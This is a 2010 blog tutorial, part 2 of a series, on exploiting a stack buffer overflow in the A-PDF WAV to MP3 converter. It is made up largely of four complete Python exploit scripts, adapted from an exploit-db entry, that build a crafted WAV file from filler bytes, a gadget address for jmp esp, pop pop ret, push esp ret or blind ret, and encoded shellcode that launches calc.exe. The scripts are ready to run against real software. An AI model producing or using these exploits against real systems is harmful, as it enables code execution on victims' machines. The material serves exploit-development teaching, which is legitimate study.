
Tutorial: write an exploit, Part 2 (October 29, 2010)

Posted by michelemanzotti in manzotti.eu, Security, Tutorial.

Once you have fully understood part 1 of the tutorial, let's move on to the second one. In this tutorial we will see further techniques to exploit a buffer overflow (BOF) in A-PDF WAV to MP3, a tool that converts WAV files to MP3.

JUMP or CALL

With this technique you use a register that already contains the address where the shellcode resides and load that address into EIP. It was described in part 1 of the tutorial; the variant shown here uses a call instead of a jmp.

#!/usr/bin/env python

# http://www.exploit-db.com/exploits/14681/

#################################################################################
#
# Title:    A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exploit By:    Dr_IDE
# Tested On:    XPSP3
# Date:        August 18, 2010
# Download:     http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference:    http://www.exploit-db.com/exploits/14676/
# Usage:    Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################

# windows/exec - 303 bytes  CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH

buff = b"\x41" * 4128            # filler up to the saved return address
# 1002F1C3 call esp in lame_enc.dll
eip = b"\xc3\xf1\x02\x10"        # overwrites EIP (little-endian)
nops = b"\x90" * 16
shellcode = (b"\x33\xc9\xb8\x57\xba\xf8\x4b\xdb\xda\xb1\x33\xd9\x74\x24\xf4"
b"\x5b\x83\xeb\xfc\x31\x43\x0d\x03\x43\x5a\x58\x0d\xb7\x8c\x15"
b"\xee\x48\x4c\x46\x66\xad\x7d\x54\x1c\xa5\x2f\x68\x56\xeb\xc3"
b"\x03\x3a\x18\x50\x61\x93\x2f\xd1\xcc\xc5\x1e\xe2\xe0\xc9\xcd"
b"\x20\x62\xb6\x0f\x74\x44\x87\xdf\x89\x85\xc0\x02\x61\xd7\x99"
b"\x49\xd3\xc8\xae\x0c\xef\xe9\x60\x1b\x4f\x92\x05\xdc\x3b\x28"
b"\x07\x0d\x93\x27\x4f\xb5\x98\x60\x70\xc4\x4d\x73\x4c\x8f\xfa"
b"\x40\x26\x0e\x2a\x99\xc7\x20\x12\x76\xf6\x8c\x9f\x86\x3e\x2a"
b"\x7f\xfd\x34\x48\x02\x06\x8f\x32\xd8\x83\x12\x94\xab\x34\xf7"
b"\x24\x78\xa2\x7c\x2a\x35\xa0\xdb\x2f\xc8\x65\x50\x4b\x41\x88"
b"\xb7\xdd\x11\xaf\x13\x85\xc2\xce\x02\x63\xa5\xef\x55\xcb\x1a"
b"\x4a\x1d\xfe\x4f\xec\x7c\x95\x8e\x7c\xfb\xd0\x90\x7e\x04\x73"
b"\xf8\x4f\x8f\x1c\x7f\x50\x5a\x59\x81\xa1\x57\x74\x15\x18\x02"
b"\x35\x78\x9b\xf8\x7a\x84\x18\x09\x03\x73\x00\x78\x06\x38\x86"
b"\x90\x7a\x51\x63\x97\x29\x52\xa6\xf4\xac\xc0\x2a\xd5\x4b\x60"
b"\xc8\x29\x9e")
sploit = buff + eip + nops + shellcode

try:
    with open("Drop.wav", "wb") as f1:    # No file checking, any file extension works... (.xyz .foo .abc)
        f1.write(sploit)
    print('[*] Success. Load File.')
except IOError:
    print("[-] Error, could not write the file.")

POP RETURN

If no register points directly to the shellcode, but you can see an address on the stack (the first, second or third address on the stack) that points to the shellcode, then you can load that value into EIP by first putting a pointer to a pop ret or pop pop ret (depending on where the address is found on the stack) into EIP.
In the first tutorial we saw that the shellcode was located right at EIP, and it was necessary to add 8 more nops so that execution began on the first byte of the shellcode.
Let's suppose that the shellcode is located 8 bytes further on. To reach it we can use a pop pop ret, found by searching the loaded DLLs, and then a jmp esp to land directly on the shellcode. So EIP holds an address that points to a pop pop ret opcode, and right after the 8 bytes of junk there is the address of the jmp esp opcode that jumps to the shellcode.

[ BOF ] [pop pop ret] [junk] [ jmp esp ] [nops] [shellcode]

#!/usr/bin/env python

# http://www.exploit-db.com/exploits/14681/

#################################################################################
#
# Title:    A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exploit By:    Dr_IDE
# Tested On:    XPSP3
# Date:        August 18, 2010
# Download:     http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference:    http://www.exploit-db.com/exploits/14676/
# Usage:    Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################

# windows/exec - 303 bytes  CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH

buff = b"\x41" * 4128            # filler up to the saved return address
# 00428F3F jmp esp in wavtomp3.exe
# 10034207 pop pop ret in lame_enc.dll
eip = b"\x07\x42\x03\x10"        # pop pop ret: overwrites EIP (little-endian)
esp = b"\x3f\x8f\x42\x00"        # jmp esp: popped into EIP by the ret
junk = b"\x42" * 8               # consumed by the two pops
nops = b"\x90" * 4
shellcode = (b"\x33\xc9\xb8\x57\xba\xf8\x4b\xdb\xda\xb1\x33\xd9\x74\x24\xf4"
b"\x5b\x83\xeb\xfc\x31\x43\x0d\x03\x43\x5a\x58\x0d\xb7\x8c\x15"
b"\xee\x48\x4c\x46\x66\xad\x7d\x54\x1c\xa5\x2f\x68\x56\xeb\xc3"
b"\x03\x3a\x18\x50\x61\x93\x2f\xd1\xcc\xc5\x1e\xe2\xe0\xc9\xcd"
b"\x20\x62\xb6\x0f\x74\x44\x87\xdf\x89\x85\xc0\x02\x61\xd7\x99"
b"\x49\xd3\xc8\xae\x0c\xef\xe9\x60\x1b\x4f\x92\x05\xdc\x3b\x28"
b"\x07\x0d\x93\x27\x4f\xb5\x98\x60\x70\xc4\x4d\x73\x4c\x8f\xfa"
b"\x40\x26\x0e\x2a\x99\xc7\x20\x12\x76\xf6\x8c\x9f\x86\x3e\x2a"
b"\x7f\xfd\x34\x48\x02\x06\x8f\x32\xd8\x83\x12\x94\xab\x34\xf7"
b"\x24\x78\xa2\x7c\x2a\x35\xa0\xdb\x2f\xc8\x65\x50\x4b\x41\x88"
b"\xb7\xdd\x11\xaf\x13\x85\xc2\xce\x02\x63\xa5\xef\x55\xcb\x1a"
b"\x4a\x1d\xfe\x4f\xec\x7c\x95\x8e\x7c\xfb\xd0\x90\x7e\x04\x73"
b"\xf8\x4f\x8f\x1c\x7f\x50\x5a\x59\x81\xa1\x57\x74\x15\x18\x02"
b"\x35\x78\x9b\xf8\x7a\x84\x18\x09\x03\x73\x00\x78\x06\x38\x86"
b"\x90\x7a\x51\x63\x97\x29\x52\xa6\xf4\xac\xc0\x2a\xd5\x4b\x60"
b"\xc8\x29\x9e")
sploit = buff + eip + junk + esp + nops + shellcode

try:
    with open("Drop2.wav", "wb") as f1:    # No file checking, any file extension works... (.xyz .foo .abc)
        f1.write(sploit)
    print('[*] Success. Load File.')
except IOError:
    print("[-] Error, could not write the file.")

PUSH RETURN

This technique is a little different from the call-a-register approach. If you cannot find a jmp reg or call reg opcode anywhere, you can instead push the register's value onto the stack and then ret. Basically you look for a push reg followed by a ret and put the address of that opcode sequence into EIP.

#!/usr/bin/env python

# http://www.exploit-db.com/exploits/14681/

#################################################################################
#
# Title:    A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exploit By:    Dr_IDE
# Tested On:    XPSP3
# Date:        August 18, 2010
# Download:     http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference:    http://www.exploit-db.com/exploits/14676/
# Usage:    Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################

# windows/exec - 303 bytes  CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH

buff = b"\x41" * 4128            # filler up to the saved return address
# 0047A01D push esp ret in wavtomp3.exe
eip = b"\x1d\xa0\x47\x00"        # push esp; ret: overwrites EIP (little-endian)
nops = b"\x90" * 4
shellcode = (b"\x33\xc9\xb8\x57\xba\xf8\x4b\xdb\xda\xb1\x33\xd9\x74\x24\xf4"
b"\x5b\x83\xeb\xfc\x31\x43\x0d\x03\x43\x5a\x58\x0d\xb7\x8c\x15"
b"\xee\x48\x4c\x46\x66\xad\x7d\x54\x1c\xa5\x2f\x68\x56\xeb\xc3"
b"\x03\x3a\x18\x50\x61\x93\x2f\xd1\xcc\xc5\x1e\xe2\xe0\xc9\xcd"
b"\x20\x62\xb6\x0f\x74\x44\x87\xdf\x89\x85\xc0\x02\x61\xd7\x99"
b"\x49\xd3\xc8\xae\x0c\xef\xe9\x60\x1b\x4f\x92\x05\xdc\x3b\x28"
b"\x07\x0d\x93\x27\x4f\xb5\x98\x60\x70\xc4\x4d\x73\x4c\x8f\xfa"
b"\x40\x26\x0e\x2a\x99\xc7\x20\x12\x76\xf6\x8c\x9f\x86\x3e\x2a"
b"\x7f\xfd\x34\x48\x02\x06\x8f\x32\xd8\x83\x12\x94\xab\x34\xf7"
b"\x24\x78\xa2\x7c\x2a\x35\xa0\xdb\x2f\xc8\x65\x50\x4b\x41\x88"
b"\xb7\xdd\x11\xaf\x13\x85\xc2\xce\x02\x63\xa5\xef\x55\xcb\x1a"
b"\x4a\x1d\xfe\x4f\xec\x7c\x95\x8e\x7c\xfb\xd0\x90\x7e\x04\x73"
b"\xf8\x4f\x8f\x1c\x7f\x50\x5a\x59\x81\xa1\x57\x74\x15\x18\x02"
b"\x35\x78\x9b\xf8\x7a\x84\x18\x09\x03\x73\x00\x78\x06\x38\x86"
b"\x90\x7a\x51\x63\x97\x29\x52\xa6\xf4\xac\xc0\x2a\xd5\x4b\x60"
b"\xc8\x29\x9e")
sploit = buff + eip + nops + shellcode

try:
    with open("Drop3.wav", "wb") as f1:    # No file checking, any file extension works... (.xyz .foo .abc)
        f1.write(sploit)
    print('[*] Success. Load File.')
except IOError:
    print("[-] Error, could not write the file.")

JUMP [reg + offset]

If a register points into the buffer containing the shellcode but not at the beginning of the shellcode, you can also try to find an instruction in one of the OS or application DLLs that adds the required number of bytes to the register and then jumps to it, e.g. a jmp dword ptr [esp+8].

BLIND RETURN

A RET instruction pops the last value (4 bytes) from the stack and puts that address in EIP. So if you overwrite EIP with the address of a RET instruction, you load the value stored at ESP into EIP.

We need to:
– Overwrite EIP with the address of a ret opcode
– Place the address that points to the shellcode in the first 4 bytes at ESP
So when the ret is executed, those 4 bytes are popped from the stack and put into EIP.

[BOF][ret opcode address][shellcode address][shellcode]

#!/usr/bin/env python

# http://www.exploit-db.com/exploits/14681/

#################################################################################
#
# Title:    A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exploit By:    Dr_IDE
# Tested On:    XPSP3
# Date:        August 18, 2010
# Download:     http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference:    http://www.exploit-db.com/exploits/14676/
# Usage:    Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################

# windows/exec - 303 bytes  CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH

buff = b"\x41" * 4128            # filler up to the saved return address
# 76541842 ret in user32.dll
# 00428F3F jmp esp in wavtomp3.exe
eip = b"\x42\x18\x54\x76"        # ret: overwrites EIP (little-endian)
esp = b"\x3f\x8f\x42\x00"        # jmp esp: first 4 bytes at ESP, popped by the ret
nops = b"\x90" * 4
shellcode = (b"\x33\xc9\xb8\x57\xba\xf8\x4b\xdb\xda\xb1\x33\xd9\x74\x24\xf4"
b"\x5b\x83\xeb\xfc\x31\x43\x0d\x03\x43\x5a\x58\x0d\xb7\x8c\x15"
b"\xee\x48\x4c\x46\x66\xad\x7d\x54\x1c\xa5\x2f\x68\x56\xeb\xc3"
b"\x03\x3a\x18\x50\x61\x93\x2f\xd1\xcc\xc5\x1e\xe2\xe0\xc9\xcd"
b"\x20\x62\xb6\x0f\x74\x44\x87\xdf\x89\x85\xc0\x02\x61\xd7\x99"
b"\x49\xd3\xc8\xae\x0c\xef\xe9\x60\x1b\x4f\x92\x05\xdc\x3b\x28"
b"\x07\x0d\x93\x27\x4f\xb5\x98\x60\x70\xc4\x4d\x73\x4c\x8f\xfa"
b"\x40\x26\x0e\x2a\x99\xc7\x20\x12\x76\xf6\x8c\x9f\x86\x3e\x2a"
b"\x7f\xfd\x34\x48\x02\x06\x8f\x32\xd8\x83\x12\x94\xab\x34\xf7"
b"\x24\x78\xa2\x7c\x2a\x35\xa0\xdb\x2f\xc8\x65\x50\x4b\x41\x88"
b"\xb7\xdd\x11\xaf\x13\x85\xc2\xce\x02\x63\xa5\xef\x55\xcb\x1a"
b"\x4a\x1d\xfe\x4f\xec\x7c\x95\x8e\x7c\xfb\xd0\x90\x7e\x04\x73"
b"\xf8\x4f\x8f\x1c\x7f\x50\x5a\x59\x81\xa1\x57\x74\x15\x18\x02"
b"\x35\x78\x9b\xf8\x7a\x84\x18\x09\x03\x73\x00\x78\x06\x38\x86"
b"\x90\x7a\x51\x63\x97\x29\x52\xa6\xf4\xac\xc0\x2a\xd5\x4b\x60"
b"\xc8\x29\x9e")
sploit = buff + eip + esp + nops + shellcode

try:
    with open("Drop4.wav", "wb") as f1:    # No file checking, any file extension works... (.xyz .foo .abc)
        f1.write(sploit)
    print('[*] Success. Load File.')
except IOError:
    print("[-] Error, could not write the file.")
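To see where each of the four layouts above (jmp/call esp, pop pop ret, push esp ret, blind ret) hands control, here is an added example that is not the post's code nor the exploit's: a small Python model of the stack semantics involved. Every gadget address, the stack base and the payload bytes are placeholders constructed for the model; nothing is executed.

```python
import struct
# Added example (not the post's code): a tiny model of the x86 stack semantics
# the four layouts above rely on (pop, push esp, ret, jmp esp). Every address,
# the stack base and the payload bytes are placeholders constructed for the model.
STACK_BASE = 0x0012F000      # assumed address of the first byte after the overwritten EIP
SLACK = 16                   # scratch room below ESP so a push has somewhere to write
PPR, PUSH_ESP_RET, RET, JMP_ESP = 0x10000001, 0x10000002, 0x10000003, 0x10000004
GADGETS = {                  # what each placeholder address "executes"
    PPR: ["pop", "pop", "ret"],
    PUSH_ESP_RET: ["push esp", "ret"],
    RET: ["ret"],
    JMP_ESP: ["jmp esp"],    # 'call esp' lands in the same place as 'jmp esp'
}
TAIL = b"\x90" * 4 + b"\xcc" * 8   # nops + stand-in shellcode bytes; never executed
JUNK = b"B" * 8
def p32(v): return struct.pack("<I", v)

def landing(after_eip, first_eip):
    """Run from the moment the overwritten return address `first_eip` is popped, so ESP
    points at after_eip[0]. Return the offset into after_eip where execution lands, or None."""
    mem = bytearray(SLACK) + bytearray(after_eip)
    esp, eip = SLACK, first_eip
    for _ in range(32):                                  # bound the walk
        if STACK_BASE <= eip < STACK_BASE + len(after_eip):
            return eip - STACK_BASE                      # landed inside our bytes
        if eip not in GADGETS:
            return None                                  # neither stack nor gadget: crash
        for insn in GADGETS[eip]:
            if insn == "pop":
                esp += 4                                 # discards 4 bytes of stack
            elif insn == "push esp":
                value = STACK_BASE + esp - SLACK         # ESP's value before the push
                esp -= 4
                mem[esp:esp + 4] = p32(value)
            elif insn == "ret":
                eip = struct.unpack("<I", mem[esp:esp + 4])[0]
                esp += 4
            elif insn == "jmp esp":
                eip = STACK_BASE + esp - SLACK
    return None

def layouts():
    """The tutorial's layouts as (bytes after EIP, EIP value, expected landing offset)."""
    return {
        "jmp/call esp": (TAIL, JMP_ESP, 0),
        "pop pop ret":  (JUNK + p32(JMP_ESP) + TAIL, PPR, len(JUNK) + 4),
        "push esp ret": (TAIL, PUSH_ESP_RET, 0),
        "blind ret":    (p32(JMP_ESP) + TAIL, RET, 4),
    }
```

It also shows the failure mode of the pop pop ret layout: with only 4 bytes of junk before the jmp esp address, the second pop discards that address and the ret pops nop bytes into EIP, so control is lost.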

SEH

Every application has a default exception handler provided by the OS. So even if the application itself does not use exception handling, you can try to overwrite the SEH handler with your own address and make it jump to your shellcode. Using SEH can make an exploit more reliable across various Windows platforms, but it requires some more explanation before you can start abusing the SEH to write exploits. That's why the next tutorial will be entirely dedicated to this technique.

The following video shows the techniques just described:

See you
Michele `m7x` Manzotti

References: Thanks to Corelan.
